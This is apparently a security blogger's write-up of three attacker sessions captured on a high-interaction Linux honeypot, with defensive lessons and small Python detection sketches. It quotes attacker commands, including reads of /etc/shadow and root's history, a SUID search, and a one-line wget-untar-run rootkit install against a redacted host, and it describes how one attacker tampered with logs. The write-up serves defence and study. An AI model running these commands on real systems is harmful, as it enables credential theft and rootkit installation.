The honeypot v2 — first interesting captures

I have been running the high-interaction honeypot I designed in October for six weeks. The setup is essentially as planned: a real Linux box, deliberately compromised on a regular schedule, behind a firewall that lets the attacker in but stops them from launching attacks against anyone else. Every byte of every interaction is captured.

In six weeks I have logged about thirty discrete compromise events, of which maybe ten produced data interesting enough to be worth writing about. Three are worth describing in detail because each teaches a different lesson.

Capture one: the patient enumerator

Date, sanitised: a weekend evening, late.

The attacker had compromised the honeypot via a known vulnerability in a service I had deliberately left unpatched. The exploit succeeded; they had a root shell. What happened next was instructive.

For the first ninety seconds, no commands. They were watching. Probably waiting to see whether the shell was monitored, whether the connection got kicked, whether anything happened at all.

Then, in this exact order:

w
last
ps -ef
netstat -an
cat /etc/passwd
cat /etc/shadow
ls /root
ls /home
cat ~/.bash_history (mine)
cat /root/.bash_history
find / -perm -4000 -type f 2>/dev/null (looking for SUID binaries)
crontab -l
cat /etc/cron.d/*
find /var/log -type f -mtime -7 (recent log activity)
uname -a
cat /proc/version
cat /proc/cpuinfo
df -h
mount

Nineteen separate commands in about two minutes, all read-only, none doing any harm to the system. They were enumerating. Nothing else.
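The "all read-only" judgement can be made mechanical. What follows is a minimal sketch, not the tooling used on the honeypot: the allowlist READ_ONLY_COMMANDS, the helper is_read_only, and the decision to treat any pipe, chaining or substitution as suspicious are all assumptions made for illustration.

```python
import shlex

# Hypothetical allowlist of commands treated as pure enumeration (an assumption).
READ_ONLY_COMMANDS = {
    "w", "last", "ps", "netstat", "cat", "ls", "find",
    "crontab", "uname", "df", "mount", "id",
}
# find(1) actions that modify files or run other programs.
FIND_ACTIONS = {"-delete", "-exec", "-execdir", "-ok", "-okdir",
                "-fprint", "-fprint0", "-fprintf", "-fls"}
# Redirections that only discard output.
HARMLESS_REDIRECTS = {"2>/dev/null", ">/dev/null"}


def is_read_only(command: str) -> bool:
    """Return True if the command looks like enumeration with no side effects."""
    # Be conservative: pipes, chaining and substitution could hide anything.
    if any(ch in command for ch in ";|&`$("):
        return False
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: refuse to guess
        return False
    if not tokens:
        return True
    name, args = tokens[0], tokens[1:]
    if name not in READ_ONLY_COMMANDS:
        return False
    # Any redirection other than discarding output counts as a write.
    if any(">" in t and t not in HARMLESS_REDIRECTS for t in args):
        return False
    if name == "find" and FIND_ACTIONS.intersection(args):
        return False
    if name == "crontab" and args != ["-l"]:
        return False
    if name == "mount" and args:
        return False
    return True


# The enumeration sequence from this capture, as listed above.
SESSION = [
    "w", "last", "ps -ef", "netstat -an",
    "cat /etc/passwd", "cat /etc/shadow", "ls /root", "ls /home",
    "cat ~/.bash_history", "cat /root/.bash_history",
    "find / -perm -4000 -type f 2>/dev/null",
    "crontab -l", "cat /etc/cron.d/*",
    "find /var/log -type f -mtime -7",
    "uname -a", "cat /proc/version", "cat /proc/cpuinfo", "df -h", "mount",
]

if __name__ == "__main__":
    for cmd in SESSION:
        print(is_read_only(cmd), cmd)
```

A classifier like this errs on the side of calling things suspicious, which seems the right bias for triage: a session that passes is almost certainly pure reconnaissance, and the first command that fails is where to start reading.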

At the end, they typed id, saw they were root, and then issued a single command: wget http://[a server I do not name]/x.tgz. The wget was, as designed, blocked at the firewall. They tried curl. Same result. They tried opening a TCP connection to port 80 outbound directly with bash's /dev/tcp/. Same result. After about thirty seconds of trying to fetch their toolkit, they gave up. Closed the shell. Did not return.

The lesson: a competent attacker's first action on a fresh shell is reconnaissance, not further exploitation. The full attack sequence is enumerate, fetch tools, deploy, persist, pivot, exfiltrate. My honeypot caught them at the boundary between enumerate and fetch. The block at fetch-tools is decisive: without their tools, they have nothing useful to do.

For a real defender: outbound HTTP from a compromised internal host is the indicator I would now most watch for. The attacker's tools live elsewhere; the moment of fetching them is the moment they expose themselves.
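As an illustration of watching for that indicator, here is a minimal sketch that filters firewall log entries for web-port connections leaving the internal network. The FlowRecord fields, the 10.0.0.0/8 internal range and the port list are assumptions; a real firewall log will need its own parser. The addresses are from the documentation ranges.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class FlowRecord:
    """One firewall log entry; the field names are hypothetical."""
    src: str
    dst: str
    dport: int
    action: str  # "ALLOW" or "DROP"


def outbound_web_attempts(records, internal="10.0.0.0/8", ports=(80, 443)):
    """Return records where an internal host tried to reach an external web port."""
    net = ip_network(internal)
    return [
        r for r in records
        if ip_address(r.src) in net
        and ip_address(r.dst) not in net
        and r.dport in ports
    ]


if __name__ == "__main__":
    log = [
        FlowRecord("10.0.0.5", "203.0.113.7", 80, "DROP"),    # toolkit fetch attempt
        FlowRecord("10.0.0.5", "10.0.0.9", 80, "ALLOW"),      # internal traffic
        FlowRecord("198.51.100.4", "10.0.0.5", 22, "ALLOW"),  # inbound
    ]
    for hit in outbound_web_attempts(log):
        print(hit)
```

The filter deliberately ignores the action field: a dropped attempt is as informative as an allowed one, because it is the attempt that reveals the compromise.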

Capture two: the script kiddie

Different night, different attacker, different shape.

This one ran a single command sequence within seconds of getting shell:

wget http://[host]/rk.tgz; tar xzf rk.tgz; cd rk; ./install

A pre-packaged rootkit, which they attempted to deploy in one motion. The wget was blocked. The shell exited. They did not investigate further.

The package at the rootkit's URL was, on later analysis, an underground board's standard kit. Their script was clearly something they had got from a tutorial or a friend; their understanding of what to do when the wget failed was zero. They had a recipe, the recipe required a successful download, the download did not work, end of attack.

The lesson: a substantial fraction of attackers are running scripts. The scripts have rigid sequences. Anything that breaks the sequence stops the attacker dead. These are not the skilled attackers; they are the long tail of less-skilled but high-volume actors.

For a real defender: many attacks fail because of the simplest possible defensive measure. Outbound network filtering on a compromised host stops the script kiddie pattern at the first step. The defence does not need to anticipate the attack; it needs to block whatever the attack assumes.
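"Block whatever the attack assumes" is, in practice, a default-deny egress policy: list the few destinations a host legitimately needs and refuse everything else. The sketch below shows the decision logic only. The egress_allowed helper and the allowlist entries are hypothetical, and this is not the honeypot's actual firewall configuration.

```python
from ipaddress import ip_address, ip_network


def egress_allowed(dst: str, dport: int, allowlist) -> bool:
    """Default deny: permit only (network, port) pairs that are explicitly listed."""
    addr = ip_address(dst)
    return any(
        addr in ip_network(net) and dport == port
        for net, port in allowlist
    )


if __name__ == "__main__":
    # Hypothetical allowlist: one DNS resolver and one off-host log collector.
    allowlist = [
        ("192.0.2.53/32", 53),
        ("192.0.2.10/32", 514),
    ]
    print(egress_allowed("192.0.2.53", 53, allowlist))   # resolver lookup
    print(egress_allowed("203.0.113.7", 80, allowlist))  # toolkit download
```

Nothing in the policy mentions wget, curl or rootkits. It does not need to know what the attacker will try, only what the host is supposed to do.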

Capture three: the patient operator

The most interesting capture. A sanitised summary, because details would identify the attacker more than I want.

Attacker compromised the honeypot via the same vulnerability as the first capture. Did the same enumeration sequence, more thoroughly. After enumerating, instead of trying to fetch tools, they did something I had not anticipated: they studied the system.

For about forty minutes they read configuration files. The Apache config, line by line. The mail config. The cron entries. The log files for the past week. The contents of /etc/init.d/. They were building a mental model of this specific machine.

Then they did three things in sequence:

Modified one cron job to add a single line, executing a small script that they wrote into /tmp/.x.sh. The cron change was tiny — they appended one entry to a file with many entries, and the appended entry was visually consistent with the others.
Created a hidden file in /tmp/ containing a few configuration values for what was clearly a custom backdoor.
Modified ~root/.bash_history to remove evidence of their own commands. Specifically, they edited it with sed to remove only the lines that referenced their own activity, leaving the rest of the history intact.

Then they exited cleanly.

The new cron job's script was designed to phone home — but the phone-home was blocked at the firewall. The custom backdoor was designed to work on this exact machine. The history-manipulation was designed to leave no trace of the visit.

If I had not been watching the firewall, the OS-level audit log, and the serial console, I would not have caught any of this. The bash history showed nothing. The system files looked untouched: the only change was one plausible-looking cron entry. The only evidence was in places the attacker could not reach.
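One way to turn that observation into a check is to compare the commands captured off-host with what the on-host history file claims happened. This is a minimal sketch under stated assumptions: the off-host capture has already been reduced to one command per line, scrubbed_commands is a hypothetical helper, and the sample commands are invented for illustration rather than taken from the capture.

```python
from collections import Counter


def scrubbed_commands(captured, on_host_history):
    """Return commands seen in the off-host capture but absent from on-host history.

    Repeated commands are matched one for one, so deleting a single
    occurrence of a command that was run twice is still reported.
    """
    remaining = Counter(line.strip() for line in on_host_history if line.strip())
    missing = []
    for line in captured:
        cmd = line.strip()
        if not cmd:
            continue
        if remaining[cmd] > 0:
            remaining[cmd] -= 1   # accounted for in the on-host history
        else:
            missing.append(cmd)   # ran, but the history does not admit it
    return missing


if __name__ == "__main__":
    # Invented example data, not the real session.
    captured = ["uname -a", "vi /etc/crontab", "ls /tmp", "uname -a"]
    history = ["uname -a", "ls /tmp"]
    print(scrubbed_commands(captured, history))
```

An empty result means the history file is consistent with the capture. Anything else is a list of exactly the commands someone wanted forgotten, which is more useful than the history itself.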

The lesson: skilled attackers are quiet. They study the system. They make minimal changes. They cover their traces locally. The only way to detect this kind of attacker is from outside the compromised system. Logs that live on the compromised host are inadequate evidence; the attacker can rewrite them.
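A small change such as one appended cron line is easy to miss by eye but trivial to catch by comparing file digests against a baseline kept somewhere the attacker cannot write. The sketch below is one possible approach, not a description of the honeypot's monitoring. The snapshot and changed_paths helpers are hypothetical, and it assumes both the baseline and the hashing run from a trusted context, since tools on a compromised host can lie.

```python
import hashlib
from pathlib import Path


def snapshot(paths):
    """Map each path to the SHA-256 of its contents, or None if it is not a file."""
    digests = {}
    for p in paths:
        path = Path(p)
        digests[str(path)] = (
            hashlib.sha256(path.read_bytes()).hexdigest() if path.is_file() else None
        )
    return digests


def changed_paths(baseline, current):
    """Return the sorted paths whose digest differs, including added or removed files."""
    return sorted(
        p for p in baseline.keys() | current.keys()
        if baseline.get(p) != current.get(p)
    )


if __name__ == "__main__":
    # Hypothetical watch list; a real one would cover far more of the system.
    watched = ["/etc/crontab", "/etc/passwd"]
    baseline = snapshot(watched)   # taken while the host is known to be clean
    # ... later, from a trusted context ...
    print(changed_paths(baseline, snapshot(watched)))
```

A digest comparison says that a file changed, not what changed. Pairing it with an off-host copy of the file's previous contents would show the appended line directly.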

This is why the structured-logging discipline matters so much when the logs are forwarded off-host. It is also why every serious incident-response procedure has to start with the assumption that on-host artefacts may have been tampered with.

What I am taking from six weeks

A few generalisations that I am holding tentatively, in keeping with my calibrated-uncertainty discipline:

The threat population has wide variance. The first capture was a moderately skilled enumerator. The second was a script-following novice. The third was someone genuinely capable. The defensive measures that work against each are different.

Outbound network filtering is the highest-leverage single defence. Every successful attack I have seen would have been disrupted, in one way or another, by tighter outbound filtering on compromised hosts.

Off-host logging is the second-highest-leverage defence. The skilled attacker covers traces locally. Anything that does not live on the compromised host is what tells you what happened.

The honeypot itself is generating useful intelligence. This was the hypothesis. Six weeks is too short a run to be definitive, but the data so far is encouraging. I will keep it running and write up further captures as they appear.

More as the year develops. The next planned post is on the Phrack 56 reading I have been doing.